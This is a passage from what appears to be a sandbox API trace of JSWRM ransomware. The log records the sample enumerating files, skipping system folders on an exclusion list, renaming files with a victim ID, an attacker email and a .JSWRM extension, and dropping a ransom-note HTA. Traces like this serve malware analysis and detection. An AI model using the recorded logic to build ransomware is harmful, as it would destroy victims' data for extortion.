Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.739] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x73430dfb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x261f2e00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x60002, dwReserved1=0x224dc4, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2=".") returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="..") returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="...") returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="windows") returned -1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="recovery") returned -1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="perflogs") returned -1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="documents and settings") returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="system volume information") returned -1 [0068.739] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="msocache") returned -1 [0068.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe.mui", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0068.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe.mui", cchWideChar=16, lpMultiByteStr=0x241358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0068.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.741] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10089634094894584) returned 0 [0068.741] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.741] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.741] CloseHandle (hObject=0xffffffff) returned 1 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0068.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0068.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.742] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.742] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x73430dfb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x261f2e00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x60002, dwReserved1=0x224dc4, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0068.742] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.742] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa0714b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa0714b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.742] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.743] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2=".") returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="..") returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="...") returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="windows") returned -1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="recovery") returned -1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="perflogs") returned -1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="documents and settings") returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="system volume information") returned -1 [0068.743] lstrcmpiW (lpString1="msinfo32.exe", lpString2="msocache") returned -1 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe", lpUsedDefaultChar=0x0) returned 12 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msinfo32.exe", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msinfo32.exe", lpUsedDefaultChar=0x0) returned 12 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.743] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0068.743] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0068.744] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2=".") returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="..") returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="...") returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="windows") returned -1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="recovery") returned -1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="perflogs") returned -1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="documents and settings") returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="$RECYCLE.BIN") returned 1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="system volume information") returned -1 [0068.744] lstrcmpiW (lpString1="OFFICE16", lpString2="msocache") returned 1 [0068.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0068.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0068.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\jswrm-decrypt.hta")) returned 0xffffffff [0068.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.751] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.751] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.752] CloseHandle (hObject=0x298) returned 1 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\jswrm-decrypt.hta")) returned 0x20 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.753] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1fa2d16a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0068.753] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.753] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, 